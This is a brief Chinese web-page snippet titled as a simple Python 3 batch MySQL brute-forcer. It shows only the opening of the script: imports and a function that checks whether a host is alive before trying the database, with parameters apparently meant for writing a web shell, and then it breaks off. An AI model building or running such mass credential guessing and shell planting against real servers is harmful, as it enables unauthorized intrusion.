一個簡單的python3批量爆破mysql

# coding:utf-8 import pymysql import threading import time import IPy import subprocess def mysql_connect1(ip,shell_url,shell_content): #判斷是否存活 if not(ping_ip(ip)): return #嘗試數據庫
相關文章
相關標籤/搜索